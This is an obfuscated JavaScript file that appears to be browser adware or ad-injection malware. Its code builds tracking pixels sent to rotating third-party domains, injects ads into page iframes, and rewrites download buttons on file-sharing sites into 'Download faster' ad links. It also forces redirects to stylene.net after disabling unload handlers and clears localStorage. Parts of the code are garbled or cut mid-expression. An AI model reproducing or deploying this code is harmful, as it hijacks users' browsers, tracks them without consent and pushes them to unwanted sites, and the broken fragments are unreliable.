b=(63,342)>(559,85)?(56,!0):(63,1401),c=(372,1)<(364,98)?(1098,!1):(971,40),d=829<(71,1335)?(1100,122):(918,478),e=12>(481,500)?267:586<(136,1243)?(339,90):(92,89),g=27<=(42,519)?(468,97):(69,283),h=137<(169,296)?(93,\"m\"):(96,984),f=136>=(37,599)?(92,301):(966,429)<=(369,537)?(213,64):(578,1008),l=307>=(1295,\n1355)?(809,\"L\"):69>=(158,391)?(669,117):141<(368,514)?(1490,6):(1113,116),n=(43,255)>=(223,250)?(468,63):(879,133),k=22>(199,868)?(1170,\"s\"):(917,799)>=(972,448)?(122,\"n\"):44>=(211,96)?(1080,71):(58,556),A=75>=(1239,49)?(21,\"9\"):27>=(501,441)?(59,48):(207,1058)<(454,90)?\";\":(122,914),K=414>=(295,137)?(109,\"8\"):(1165,557),v=874>=(78,39)?(77,\"7\"):116>(476,807)?(1499,989):(520,925),R=(953,33)>(639,132)?(434,\"z\"):149<(132,581)?(77,\"z\"):61>=(597,482)?126:(771,8),S=456<=(451,877)?(2,\"x\"):(52,18),F=326<\n(1197,1202)?(1274,\"i\"):(26,109),G=410>=(1290,732)?(485,25):52>(20,78)?1380:1102>=(49,51)?(294,\"b\"):(112,161),L=(146,387)>(818,87)?(534,\"Y\"):(1385,1004),T=52<(95,139)?(57,\"X\"):(840,124),U=123<=(105,50)?(142,\"'\"):1333>(11,318)?(108,\"T\"):(962,1482),M=(755,119)>=(49,128)?47:880<(473,103)?41:59>(183,40)?(272,\"Q\"):(125,73),V=533<(155,25)?1E3:55>(133,112)?(1416,429):(31,1188)>(72,497)?(502,\"N\"):(82,144),N=(491,93)>(39,1009)?(1047,\"aaa\"):325>=(249,9)?(83,\"M\"):(645,114),O=(91,94)>(16,53)?(484,\"K\"):(462,83)>=\n(3,103)?(114,90):146<(114,132)?\"O\":(145,53),P=259<(286,86)?209:142>=(303,8)?(189,\"D\"):88>=(24,287)?(40,191):(1406,186),W=102<=(476,402)?(132,4537426):(315,47),H=(97,23)<=(514,29)?(117,1290452675):(862,1417),B=117<(32,132)?(352,\"0\"):(78,430),r=110>(545,410)?(71,457):548>=(81,37)?(555,\"2\"):(96,999),w=82<(1007,1382)?(869,\"f\"):(86,207),D=131>=(471,71)?(208,\"s\"):(103,115),C=107>=(74,129)?(25,\"c\"):(20,532)<=(74,750)?(20,\"p\"):237>(31,498)?(446,133):(110,138),I=100<(31,83)?(54,129):(112,132)<=(75,408)?(49,\n\"U\"):(593,65),H=-H,E=s7S5.V7T,J=s7S5.j7T;-1139651341!==s7S5.E0.i0(J.toString(),J.toString().length,8698539J++)y.push(u(j)),S9(),E+=s7S5.V7T;if(s7S5.E0.i0(E.toString(),E.toString().length,W)!==H)return j2<=(145,38)?(1201,\"S\"):(91,1254),c=146<=(1489,582)?(1031,\"5\"):(252,74),d=(58,41)<=(298,99)?(685,\"_\"):\n(213,84)<=(44,76)?(422,31):(14,1),e=\"\",g,h,s,m,t,p,x=s7S5.Y7T;for(a=Q[d+\"ut\"+w+K+d+s7S5.n7T+k+\"code\"](a);s7S5[I+c](x,a.length);)g=a[s7S5.g7T+\"harC\"+s7S5.W9T+s7S5.r7T+s7S5.n7T+s7S5.E9T+s7S5.I7T](x++),h=a[s7S5.G7T+s7S5.j4T+s7S5.G4T+s7S5.d9T+\"eA\"+s7S5.I7T](x++),s=a[s7S5.g7T+s7S5.s4T+s7S5.N7T+s7S5.A7T+s7S5.G4T+s7S5.d9T+\"eA\"+s7S5.I7T](x++),m=s7S5[C+r](g,s7S5.V7T),t=111>(67,494)?107:(1207,1483)>(746,910)?(1313,\"F\"):138>=(435,222)?309:(209,1488),g=s7S5[t+c]((g&s7S5.e7T)<>s7S5.C7T),t=s7S5.A5((h&\ns7S5.K7T)<>l),p=s7S5[P+c](s,n),isNaN(h)?t=p=f:isNaN(s)&&(p=f),e=e+this[\"_keySt\"+s7S5.A7T][s7S5.G7T+s7S5.N7T+s7S5.A7T+s7S5.E9T+s7S5.I7T](m)+this[\"_key\"+b+s7S5.I7T+s7S5.A7T][s7S5.G7T+s7S5.N7T+s7S5.A7T+s7S5.E9T+s7S5.I7T](g)+this[d+\"k\"+s7S5.n7T+\"y\"+b+\"tr\"][s7S5.g7T+s7S5.s4T+s7S5.N7T+s7S5.A7T+s7S5.E9T+s7S5.I7T](t)+this[d+\"k\"+s7S5.n7T+\"y\"+b+s7S5.I7T+s7S5.A7T][s7S5.g7T+s7S5.s4T+\"arAt\"](p);return e},decode:function(a){var b=(3,44)>=(480,32)?(136,256):(731,73),c=(475,0)<=(58,543)?(121,\"u\"):(695,\n38),d=459<(262,536)?(888,72):(1044,140),e=(148,306)>=(337,136)?(202,\"H\"):(60,126),q=(283,528)<(3,97)?(261,\"aaa\"):53>(629,332)?(51,\"d\"):1229>(127,1138)?(128,44):(726,741),n=183<=(559,42)?1E4:525>=(4,82)?(35,43):(5,96),s=124>(3,67)?(195,58):(143,637)<=(104,120)?90:(22,141),m=231<(519,98)?\"j\":48<(17,1053)?(23,48):(75,139),t=(401,28)<(510,88)?(28,123):(359,105)>=(730,700)?(1021,2):(101,390),p={},x=[],v=\"\",w=String[\"fr\"+s7S5.W9T+h+s7S5.G4T+s7S5.s4T+s7S5.N7T+\"rCod\"+s7S5.n7T],n=[[65,91],[g,t],[m,s],[n,q],\n[47,m]];for(z in n)for(q=n[z][s7S5.Y7T];s7S5[e+r](q,n[z][s7S5.j7T]);q++)x[\"pu\"+D+s7S5.s4T](w(q));for(q=s7S5.Y7T;s7S5[h+r](q,f);q++)p[x[q]]=q;for(q=s7S5.Y7T;s7S5[M+r](q,a.length);q+=d)for(s=e=s7S5.Y7T,m=a[D+c+G+D+s7S5.I7T+s7S5.A7T+F+k+\"g\"](q,q+d),n=s7S5.Y7T;s7S5.P2(n,m.length);n++)for(x=p[m[s7S5.g7T+s7S5.s4T+s7S5.j4T+s7S5.E9T+s7S5.I7T](n)],e=s7S5[c+r](e,l)+x,s+=l;s7S5[\"k\"+r](s,s7S5.Z7T);)v+=w(s7S5[F+r](e>>>(s-=s7S5.Z7T),b));return v},_utf8_encode:function(a){var b=70>(376,25)?(621,224):3>=(453,58)?\n(352,2048):(42,88),c=105>=(26,66)?(400,192):(574,60),d=932<(1182,101)?775:(540,121)<=(93,95)?148:(319,561)>=(155,52)?(1234,2048):(214,257),f=(65,346)<=(114,1276)?(341,\"J\"):1351<(222,576)?(576,996):(116,1245),e=(542,339)>(95,102)?(149,127):432<=(130,104)?(114,12):(1021,686),g=79>=(61,853)?(528,\"f\"):(822,133)<=(153,1191)?(276,128):(72,85),k=961>(349,346)?(232,\"B\"):(69,79)>(389,906)?(1088,\"r\"):(1284,32),m=(489,331)<(284,680)?(46,\"l\"):(84,144);a=a[s7S5.A7T+s7S5.n7T+C+m+s7S5.N7T+s7S5.g7T+s7S5.n7T](/\\r\\n/g,\n\"\\n\");for(var m=\"\",t=s7S5.Y7T;s7S5.z2(t,a.length);t++){var p=a[s7S5.G7T+s7S5.N7T+s7S5.A7T+s7S5.G4T+s7S5.W9T+s7S5.r7T+\"eA\"+s7S5.I7T](t);s7S5[k+r](p,g)?m+=String[w+\"romC\"+s7S5.s4T+s7S5.N7T+\"rCo\"+s7S5.r7T+s7S5.n7T](p):s7S5[s7S5.A7T+r](p,e)&&s7S5[f+r](p,d)?(m+=String[w+\"ro\"+h+\"Ch\"+s7S5.N7T+s7S5.A7T+s7S5.e4T+s7S5.r7T+s7S5.n7T](s7S5[O+r](p>>l,c)),m+=String[\"fromCh\"+s7S5.j4T+s7S5.G4T+s7S5.W9T+s7S5.E7T](s7S5.l2(p&n,g))):(m+=String[\"fr\"+s7S5.W9T+\"mCha\"+s7S5.A7T+s7S5.G4T+s7S5.W9T+s7S5.E7T](s7S5[N+r](p>>12,\nb)),m+=String[\"from\"+s7S5.G4T+\"har\"+s7S5.e4T+s7S5.r7T+s7S5.n7T](s7S5[G+r](p>>l&n,g)),m+=String[w+\"romChar\"+s7S5.G4T+s7S5.W9T+s7S5.r7T+s7S5.n7T](s7S5.y2(p&n,g)))}return m}};a=Q[s7S5.r7T+s7S5.n7T+s7S5.g7T+s7S5.W9T+s7S5.r7T+s7S5.n7T](function(a){for(var b=708>=(280,660)?(153,\"R\"):(1406,82),c=a[s7S5.I7T+s7S5.W9T+I+C+C+\"er\"+s7S5.G4T+s7S5.N7T+D+s7S5.n7T](),d=a[s7S5.I7T+\"oLowe\"+s7S5.A7T+\"Cas\"+s7S5.n7T](),f=\"\",e=s7S5.Y7T;s7S5[w+r](e,a.length);++e)f+=s7S5[b+B](a[e][s7S5.g7T+\"ha\"+s7S5.A7T+s7S5.G4T+s7S5.W9T+\ns7S5.E7T+s7S5.E9T+s7S5.I7T](),c[e][s7S5.g7T+s7S5.s4T+s7S5.j4T+s7S5.G4T+s7S5.d9T+s7S5.n7T+s7S5.b7T]())?d[e]:c[e];return f}(a));for(A=s7S5.Y7T;s7S5[\"I\"+B](A,a.length);++A)if(v=a[A][s7S5.g7T+s7S5.s4T+s7S5.N7T+s7S5.A7T+\"Cod\"+s7S5.n7T+s7S5.b7T](),s7S5.X0(v,65)||s7S5[s7S5.g7T+B](v,e)&&s7S5.V0(v,g)||s7S5[L+B](v,d))return c;return b};(function(){var a=document.getElementsByTagName(\"body\")[0];a&&!a.getAttribute(\"jhjlijpomuhn_l\")&&a.setAttribute(\"jhjlijpomuhn_m\",\"l\")})();var Pixel=function(a,b){var c={http:\"\",\nhttps:\"\"},d=\"/\",e={};this.setHost=function(a){if(\"object\"==typeof a&&(\"string\"==typeof a.http||a.http instanceof Array)&&(\"string\"==typeof a.https||a.https instanceof Array))c=a;else if(\"string\"==typeof a||a instanceof Array)c={http:a,https:a};return this};this.setPath=function(a){\"string\"==typeof a&&(d=a=a.replace(/^([^\\/]|$)/,\"/$&\"));return this};this.setParameters=function(a){if(\"object\"==typeof a&&!(a instanceof Array))for(var b in a)this.setParameter(b,a[b]);return this};this.setParameter=function(a,\nb){e[a]=b;return this};var g=function(){var a=[],b;for(b in e)null!==e[b]&&void 0!==e[b]&&a.push(encodeURIComponent(b)+\"=\"+encodeURIComponent(e[b]));return a.length?\"?\"+a.join(\"&\"):\"\"},h=function(a){if(\"string\"==typeof a)return a;if(a instanceof Array)return a[Math.round(Math.random()*(a.length-1))]};this.getNonSslHost=function(){return h(c.http)||\"\"};this.getSslHost=function(){return h(c.https)||\"\"};this.buildNonSslUrl=function(){var a=this.getNonSslHost();if(a)return\"http://\"+a+d+g()};this.buildSslUrl=\nfunction(){var a=this.getSslHost();if(a)return\"https://\"+a+d+g()};this.isSecure=function(){return\"https:\"==window.location.protocol};this.toString=function(){return(this.isSecure()?this.buildSslUrl():this.buildNonSslUrl())||\"\"};this.push=function(a){a=a||function(){};var b=this.toString();if(!b)return!1;var c=new Image;c.onload=function(){a.call(this,\"success\",arguments)};c.onerror=function(){a.call(this,\"error\",arguments)};return c.src=b};this.setHost(a);this.setParameters(b)},PixelIPP=function(){return new Pixel({https:[\"winnerican.org\",\n\"winnering.info\",\"winnering.org\"],http:\"directonic.org dirnt.net dirnt.org fasterol.org loveci.info lovek.info lovement.info lovening.info loveral.net lovezhsky.com loversion.org loversion.net lovezhsky.info lovezhsky.net lovezhsky.org proffic.info proffic.org proffic.net proffican.com proffican.net\".split(\" \")},{tid:1,subid:window.adzy653rk.imp.pid,subid1:window.adzy653rk.imp.hid,subid2:window.adzy653rk.imp.eid,subid3:window.adzy653rk.imp.prid,lt:window.adzy653rk.imp.lt})},s7S5={I7T:\"t\",r2:function(a,\nb){return a>b},J2:function(a,b){return a>b},Y0:function(a,b){return a>b},l2:function(a,b){return a|b},k2:function(a,b){return a>=b},u2:function(a,b){return a<=(1266,406)?(15,0):(538,20)))+(e*a|((109,1186)>(512,400)?(748,0):(360,1325)<=(274,22)?(1351,7):(954,1040)<=(66,435)?(1069,NaN):(130,57)))|(964>=(322,35)?(238,0):(28,1324))},b={};return{z0:a,i0:function(c,d,e){if(void 0!==\nb[e])return b[e];for(var g=131>=(1300,30)?(47,3432918353):(131,72),h=(387,282)<(234,217)?979:949>=(20,130)?(103,461845907):(67,1152),f=e,l=d&-(147>(26,106)?(3,4):(30,537)),n=393<=(224,579)?(110,0):(44,609);n(67,31)?(417,\"K\"):(330,18))var k=c[(585>(255,136)?(106,\"c\"):(159,504))+(111<=(535,393)?(584,\"h\"):427<(18,57)?43:214<(1071,53)?(10,144):(1269,148))+(36>=(145,1095)?\"c\":(347,142)>(473,85)?(577,\"a\"):(568,998))+((352,49)>=(394,99)?90:1396<=(149,1300)?(1225,130):5<=\n(541,431)?(692,\"r\"):(581,48))+(242<(10,261)?(57,\"C\"):337>=(153,400)?389:1103>(82,1483)?(163,15):(385,583))+(808>=(68,37)?(563,\"o\"):(78,54))+\"deAt\"](n)&255|(c[\"c\"+(140>=(1465,372)?(1495,\"'\"):109<=(25,138)?(236,\"h\"):531<(101,20)?(67,\"l\"):(833,117))+\"arCodeA\"+((342,48)<=(128,325)?(2,\"t\"):(494,105))](n+1)&(17<(12,591)?(90,255):(100,71)))<<(252<(44,818)?(662,8):449>=(31,1115)?(1483,546):(146,81))|(c[(1349>(633,463)?(554,\"c\"):(116,51)>=(257,1072)?451:(800,39))+(91>=(141,94)?243:(138,40)>(131,458)?91:(1327,\n115)<=(22,439)?(559,\"h\"):(87,141))+\"ar\"+(149<=(51,114)?(59,233):118<(1139,173)?(72,\"C\"):(124,95))+(746>=(511,90)?(34,\"o\"):94>=(355,99)?\"H\":(240,108))+\"deA\"+(142<=(784,1264)?(287,\"t\"):(115,1190))](n+(72<=(38,44)?\"GET\":147>(566,60)?(140,2):(151,588)))&255)<<((418,483)>=(579,121)?(69,16):(64,64))|(c[(1022>(44,72)?(554,\"c\"):(910,192))+(298>(12,236)?(17,\"h\"):384>=(445,962)?(92,237):137<=(137,99)?536:(82,121))+((261,370)<(412,490)?(82,\"a\"):860<(48,105)?\"W\":(526,209))+(1261<=(10,981)?65:34<=(220,371)?(144,\n\"r\"):(173,270))+(253>(41,67)?(46,\"C\"):433<=(260,112)?(352,\"ADS\"):(17,491))+(106<=(88,427)?(131,\"o\"):(815,95))+(467>=(145,471)?64:(10,570)<=(42,1164)?(112,\"d\"):282<=(849,67)?(317,365):(87,157))+(289>=(268,1049)?(206,791):61<=(368,1293)?(77,\"e\"):(496,406))+((1281,432)<=(850,149)?(119,224):(561,101)<=(132,1264)?(143,\"A\"):(105,84))+\"t\"](n+((9,144)>(172,76)?(1227,3):(1382,39)))&255)<<(517>(59,23)?(242,24):(258,8)),k=a(k,g),k=(k&(548<=(45,120)?NaN:(69,364)<=(24,973)?(486,131071):123>(100,1339)?406:(311,\n142)))<<((1114,428)<(986,143)?1074:66<=(483,106)?(10,15):(82,1276))|k>>>(1054>=(1,394)?(986,17):(143,32)),k=a(k,h),f=f^k,f=(f&524287)<<13|f>>>(61<(6,98)?(178,19):(394,40)),f=f*(163<(1225,66)?NaN:441>(135,430)?(56,5):(706,361))+(697<=(414,52)?(989,15):(485,1112)>=(1038,144)?(108,3864292196):(1466,1071))|((60,578)>(60,30)?(384,0):(730,1252));k=172>=(491,125)?(30,0):(24,477);switch(d%(815<=(1295,238)?1240:(118,69)<=(410,132)?(68,4):(431,473))){case 22<=(818,90)?(405,3):(0,309)<=(44,273)?(92,\"W\"):(133,\n39):k=(c[\"ch\"+((57,485)>(71,1156)?239:(366,325)>=(52,383)?(122,165):20<=(72,1481)?(116,\"a\"):(4,1250))+(169<(41,364)?(102,\"r\"):(43,295))+(124<=(72,895)?(492,\"C\"):(138,198))+\"od\"+(51!=(65,51)?(140,\"P\"):(51,37)>(122,559)?(77,91):32<=(353,593)?(87,\"e\"):(511,526))+\"At\"](l+2)&255)<<(69<=(118,37)?380:(82,691)>(42,269)?(344,16):(77,92)>(143,228)?122:(76,440));case (1399,345)<(49,115)?(474,149):(3,98)>(1305,319)?(435,573):(110,7)<(1022,23)?(234,2):(489,105):k|=(c[\"char\"+(277<=(866,115)?(138,28):(87,213)>=\n(96,57)?(1220,\"C\"):(135,142)>=(138,1225)?\"A\":(555,124))+(1181<=(98,301)?!1:(104,21)<(574,1285)?(3,\"o\"):(129,316))+(275>(142,768)?72:(70,1097)>=(183,32)?(351,\"d\"):(121,187))+\"eAt\"](l+((1438,675)>=(565,65)?(1237,1):288>=(1283,355)?59:(37,6)))&((1069,119)>=(643,797)?(1307,NaN):(1153,494)>(147,349)?(1098,255):551<(110,30)?(106,NaN):(1397,107)))<<(55<=(100,1018)?(560,8):(32,253)>=(669,636)?NaN:(1177,575)<(45,499)?(22,97):(76,952));case 114>=(148,1445)?568:66<(1252,448)?(445,1):(385,55)>(167,81)?\"V\":(16,\n266):k|=c[((535,197)>=(93,39)?(140,\"c\"):(589,490))+\"harCodeA\"+(23<=(59,890)?(4,\"t\"):531<=(137,256)?(1139,\"D\"):(8,199))](l)&((80,484)<(1493,431)?265:67<(472,764)?(61,255):(1374,233)>(399,1035)?(146,140):(31,130)),k=a(k,g),k=(k&(1052>(0,436)?(108,131071):(1278,652)))<<(67<=(425,206)?(1116,15):(61,1271))|k>>>(880>(603,375)?(1278,17):(215,263)),k=a(k,h),f^=k}f^=d;f^=f>>>(116>(107,985)?(255,1210):45<(450,137)?(95,16):(301,371));f=a(f,296<=(134,59)?(165,1009):(1400,858)>(467,33)?(124,2246822507):107>(132,\n520)?(185,\"T\"):(280,1174));f^=f>>>(606>(799,130)?(607,13):(323,1437)<(96,301)?560:1231<=(488,473)?(463,NaN):(323,146));f=a(f,(1117,1311)>=(567,32)?(11,3266489909):138>(260,206)?\"p\":(100,306));f^=f>>>16;return b[e]=f}}}(),e7T:3,W9T:\"o\",c0:function(a,b){return a>b},g7T:\"c\",Z7T:8,b7T:\"At\",G4T:\"C\",V0:function(a,b){return ag[h].length||(b[g[h]]?b[g[h]]++:b[g[h]]=1)}catch(f){}var e=[],l;for(l in b)e.push([l,b[l]]);e.sort(function(a,b){return b[1]-a[1]});e=e.slice(0,25);for(l=0;l=c?!1:adzy653rk.isAncestor(a,b.parent,--c)},listenForMessages:function(){if(window.top===window){var a=adzy653rk;window.addEventListener(\"message\",function(b){try{if(0==((b.data||\"\")+\"\").indexOf(a.l.encode(a.imp.hid+\"/\"+a.imp.eid+\"/\"+a.imp.prid)+\"_\"))switch(b.data.split(\"_\")[1]){case \"IIIFAR\":for(var c=\nwindow.document.getElementsByTagName(\"iframe\"),d=0,e;d=b.length){var c=adzy653rk.imp;adzy653rk.jbs.at.length?adzy653rk.getAds(\"//\"+adzy653rk.imp.domain[\"https:\"==window.self.location.protocol?1:0]+\"/?tid=1&size=\"+adzy653rk.jbs.at.join(\",\")+\"&subid=\"+c.pid+\"&subid1=\"+c.hid+\"&subid2=\"+c.eid+\"&subid3=\"+c.prid+\"<=\"+c.lt+\"&k=\"+encodeURIComponent(adzy653rk.getKeywords())+(adzy653rk.topHost?\n\"&tdh=\"+encodeURIComponent(adzy653rk.topHost):\"\"),\"seta\"):adzy653rk.destruct()}else{if(c=adzy653rk.getAt(b[a]))(new PixelIPP).setParameter(\"size\",c).push(),adzy653rk.jbs.ifr.push(b[a]),adzy653rk.jbs.at.push(c);setTimeout(function(){d(++a)},1)}};d(0)}else adzy653rk.destruct()}else adzy653rk.destruct()},init:function(){var a=adzy653rk,b=typeof window;window.top===window?(a.listenForMessages(),a.run()):a.isAllowRunning(function(c,d){window.document.body.hasAttribute(\"data-\"+b)||(window.document.body.setAttribute(\"data-\"+\nb,c+\"\"),c&&a.run())})},dfn:function(a){if(adzy653rk.ifr.length&&(a=a?a:1,!(300=adzy653rk.ifr.length?setTimeout(function(){adzy653rk.dfn(++a)},1200):(adzy653rk.src[c]&&adzy653rk.ifr[c]&&adzy653rk.ifr[c].src!=adzy653rk.src[c][0]&&!adzy653rk.checkIfPartner()&&adzy653rk.ifrset(adzy653rk.ifr[c],adzy653rk.src[c][1],1),setTimeout(function(){b(++c)},1))};b(0)}},destruct:function(a){adzy653rk.jbs={ifr:[],at:[]};adzy653rk.rnm?adzy653rk.rnm++:(adzy653rk.rnm=1,setTimeout(adzy653rk.dfn,\n1200));adzy653rk.rnm<=adzy653rk.nrnm&&setTimeout(adzy653rk.run,1200)},getAt:function(a){a=[parseInt(\"number\"==typeof a.width||\"string\"==typeof a.width&&a.width.match(/[0-9]/)?a.width:a.scrollWidth),parseInt(\"number\"==typeof a.height||\"string\"==typeof a.height&&a.height.match(/[0-9]/)?a.height:a.scrollHeight)];for(var b=adzy653rk.imp.sizes,c=0;c=b[c][0]-5&&a[0]<=b[c][0]+5&&a[1]>=b[c][1]-5&&a[1]<=b[c][1]+5)return b[c][2];return!1},getAds:function(a,b){if(-1\",\"\"];switch(b[1]){case 1:a.src=b[0]+(-1'+d[1])}catch(e){}break;case 3:case 6:a.src=\"about:blank\";try{a.contentWindow.document.write(d[0]+b[0]+d[1])}catch(g){}}c||adzy653rk.src.push([a.src,b])},l:{xlat:\"abcdwxyzstuvrqponmijklefghABCDWXYZSTUVMNOPQRIJKLEFGH9876543210+/\",decode:function(a){a=a.toString().replace(/[^A-Za-z0-9\\+\\/]/g,\"\");for(var b=\"\",c=0;c>2,l=(g&3)<<6|h,b=b+String.fromCharCode(d<<2|e>>4);64!=g&&0d)b+=String.fromCharCode(d),c++;else if(191d)var e=a.charCodeAt(c+1),b=b+String.fromCharCode((d&31)<<6|e&63),c=c+2;else var e=a.charCodeAt(c+\n1),g=a.charCodeAt(c+2),b=b+String.fromCharCode((d&15)<<12|(e&63)<<6|g&63),c=c+3}return b},encode:function(a){a=this._utf8_encode(a);for(var b=\"\",c=0;c>2,d=(d&3)<<4|e>>4,f=(e&15)<<2|g>>6,l=g&63;isNaN(e)?f=l=64:isNaN(g)&&(l=64);b=b+this.xlat.charAt(h)+this.xlat.charAt(d)+(64==f?\"=\":this.xlat.charAt(f))+(64==l?\"=\":this.xlat.charAt(l))}return b},_utf8_encode:function(a){if(a&&a.length){for(var b=\"\",c=0;cd?b+=String.fromCharCode(d):(127d?b+=String.fromCharCode(d>>6|192):(b+=String.fromCharCode(d>>12|224),b+=String.fromCharCode(d>>6&63|128)),b+=String.fromCharCode(d&63|128))}return b}return a}}}};\nif( typeof adzy653rk !== \"undefined\")\n{adzy653rk.location = adzy653rk.imp.referrer+window.self.location.href;if(adzy653rk.location.indexOf(adzy653rk.imp.jpshort+\"=\")==-1 && adzy653rk.location.indexOf(\"adk2.co\")==-1 &&\"cdn.ad-maven.com Servedby.bigfineads.com ads.impssrv.com srv.aileronx.com ad.improvemedianetwork.com ad.yieldmanager.com tala.intlsources.com rtb-ads.avazu.net ads.onimp03.com ad.z5x.net srv1.mediads.info hnad.hanyibai.com mthd.laorenmeng.com enad.hanyibai.com cemn.197865.com c5.zedo.com nowst.63xmp.com cdn.adk2.com servedby.adxplosions.com ads.networkhm.com ad.adserverplus.com krea.laorenmeng.com cher.ehomestudy.com ads.ad-maven.com tag.contextweb.com cpm.cpc-ads.com a.ad-sys.com pzez.nongchangwangzhan.com cmen.197865.com mtvn.dixingwang.com ad.reachjunction.com an.z5x.net vqtm.nongchangwangzhan.com zvmg.furongshangcheng.com satellitetvoffer.co fw.adsafeprotected.com khad.papace.com ad.jumbaexchange.com cdn.a2ggroup.com www.adshost2.com ads.mediawhite.com servedby.adsplats.com s3-us-west-2.amazonaws.com cdn.trkclk.net media.glispa.com ads.exoclick.com ad.adnetwork.net ads.qadservice.com optimizedby.brealtime.com ads.mangomediaads.com emkl.ozhgov.com ib.adnxs.com cpm.usabeautygame.com nptv.nongchangwangzhan.com cmne.197865.com ads.ventivmedia.com fwwv.dixingwang.com\".indexOf(window.self.location.hostname)==-1 && adzy653rk.location.indexOf(\"zoneid=458516\")==-1 && adzy653rk.location.indexOf(\"zoneid=38462958\")==-1 &&adzy653rk.location.indexOf(\"2136&zid=\")==-1 && adzy653rk.location.indexOf(\"1018-1005\")==-1 && adzy653rk.location.indexOf(\"1019-1001\")==-1 && adzy653rk.location.indexOf(\"PT1312\")==-1) adzy653rk.init()}})()}catch(e){};try{(function(){var b,f,g;try{var a=window.self.location.href;if(!(window.self==window.top||\"undefined\"==typeof localStorage||\"undefined\"==typeof localStorage.setItem||-1==a.indexOf(\"txUCqSoo=\")&&!a.match(/1018-\\d{3,4}_/)&&-1==a.indexOf(\"cdncache-a.aka\"))){if(-1
';(typeof c!=\"undefined\"?c:document.getElementsByTagName(\"body\")[0]).appendChild(h);document.getElementById(\"webscorebox_frm\").submit();localStorage.clear()}}else localStorage.setItem(\"zEpoch\",k)}}catch(p){}})();(function(){var l=function(){var a=window.location.search.split(\"v=\")[1],b=a&&a.indexOf(\"&\")||-1;-1!=b&&(a=a.substring(0,b));return a},m=function(){var a=document.getElementsByClassName(\"watch-view-count\");return a&&a[0]&&a[0].innerHTML?(a=a[0].innerHTML.replace(/^([0-9,]+).*$/,\"$1\").replace(/,/g,\"\"))&&parseInt(a)&&parseInt(a)||0:0},n=function(){var a=document.getElementsByClassName(\"watch-extras-section\");if(a)for(var b=0;bf.length){if(c.waitForTokens[d])return b(null);var g=arguments.callee;c.waitTimeout=setTimeout(function(){k.waitForElementCounter++;g(a,b,e,d)},e)}else{if(c.waitForTokens[d])return b(null);c.waitForTokens[d]=!0;k.waitForElementCounter=0;return b(f)}};c.flushWaitForTokens=function(){c.waitForTokens={}};c.getRandomInt=function(a,b){return Math.floor(Math.random()*\r\n(b-a+1))+a};c.get_computed_style=\"function\"!=typeof window.getComputedStyle?function(a){return{getPropertyValue:function(b){\"float\"==b&&(b=\"styleFloat\");b=c.dhtml_prop_name(b);return\"object\"==typeof a.currentStyle&&null!=a.currentStyle&&\"undefined\"!=typeof a.currentStyle[b]?a.currentStyle[b]:null}}}:function(a,b){return window.getComputedStyle(a,b)||{getPropertyValue:function(){}}};c.query_selector_all=document.querySelectorAll?function(a){try{return document.querySelectorAll(a)}catch(b){}}:function(a){var b=\r\na.match(/^#([^,\\s]+)$/)||[];if(1=h)){for(h=0;hhistory.length){var c=navigator.userAgent.toLowerCase(),d=\"http://stylene.net/z/?f=qdwKrjnEvTY4vTmXrjnGpdwFrjk5qa%3D%3D&eid=1120&hid=6512633795638182113&pid=2921&rf=\" + encodeURIComponent(document.referrer) +\"&s=px.pluginh&r=\"+Math.random();if(-1=f-k){var a=new Date;a.setHours(a.getHours()+1);document.cookie=\"xcddsa=1;expires=\"+a.toUTCString();if(window.onbeforeunload){window.onbeforeunload=null;d+='&ch=97'};try{if(typeof(jQuery)!=\"undefined\"){jQuery(window).unbind(\"beforeunload\")}}catch(e){};window.self.location.href=d}}}else if(!window.menubar.visible&&document.referrer&&-1==document.referrer.indexOf(window.self.location.hostname)){a=new Date;a.setHours(a.getHours()+1);document.cookie=\"xcddsa=1;expires=\"+a.toUTCString();if(window.onbeforeunload){window.onbeforeunload=null;d+='&ch=97'};var b=document.createElement(\"script\");b.type=\"text/javascript\";-1p.length){if(h.waitForTokens[m])return k(null);\nvar q=arguments.callee;h.waitTimeout=setTimeout(function(){n.waitForElementCounter++;q(e,k,l,m)},l)}else{if(h.waitForTokens[m])return k(null);h.waitForTokens[m]=!0;n.waitForElementCounter=0;return k(p)}};h.flushWaitForTokens=function(){h.waitForTokens={}};h.getRandomInt=function(e,h){return Math.floor(Math.random()*(h-e+1))+e};h.get_computed_style=\"function\"!=typeof window.getComputedStyle?function(e){return{getPropertyValue:function(k){\"float\"==k&&(k=\"styleFloat\");k=h.dhtml_prop_name(k);return\"object\"==\ntypeof e.currentStyle&&null!=e.currentStyle&&\"undefined\"!=typeof e.currentStyle[k]?e.currentStyle[k]:null}}}:function(e,h){return window.getComputedStyle(e,h)||{getPropertyValue:function(){}}};h.query_selector_all=document.querySelectorAll?function(e){try{return document.querySelectorAll(e)}catch(h){}}:function(e){var h=e.match(/^#([^,\\s]+)$/)||[];if(1').appendTo(\"body\")}}catch(e){}}.toString()+\n\")()\";document.getElementsByTagName(\"head\")[0].appendChild(h)}}};this[\"ehd.c\"]=new function(){this.init=function(){-1\")}}catch(v){\"undefined\"!==typeof h&&30<++h&&clearInterval(e)}}},750)}catch(k){}})()}};this[\"ziddu.com\"]=new function(){this.init=function(){var h=\n0,e=setInterval(function(){h++;if(-1=n;n++)m=m.parentNode;if(-1Download faster CLICK HERE',clearInterval(h.interval2))};h.interval2=setInterval(h.kickassClick,500)}}};this[\"kickass.so\"]=new function(){var h=this;\nh.init=function(){if(location.protocol+\"//\"+window.location.host+\"/\"!=window.location.href){h.counter=0;h.___ZskskskCount=0;h.___ZskskskthisZ=function(){try{20<++h.___ZskskskCount&&clearInterval(h.___ZskskskInter);for(var e=document.getElementsByTagName(\"div\"),k=0;kDownload faster CLICK HERE',clearInterval(h.interval2))};h.interval2=setInterval(h.kickassClick,500)}}};this[\"uploadrocket.net\"]=new function(){this.init=\nfunction(){var h=n.utils.query_selector_all(\".dlbutton_green\");if(h&&0h.counter++){var k=\ne.children[0];if(\"undefined\"!==typeof k&&-1e.length)&&(e=e[1],\"undefined\"!==typeof e)){var h=n.utils.duplicateElement(e),l=e.parentNode;l.insertBefore(h,e);l.removeChild(e)}}},500)}};this[\"descargadictos.net\"]=new function(){var h=this;h.init=function(){h.counter=0;h.interval=setInterval(function(){var e=n.utils.query_selector_all(\".content\")[0].children[1];if(\"undefined\"!==typeof e){if(30>h.counter++){var k=e.firstChild;if(\"undefined\"!==typeof k&&-1h.length&&(h=n.utils.query_selector_all(\".button_upload green\"));for(var e=0;e-1){var 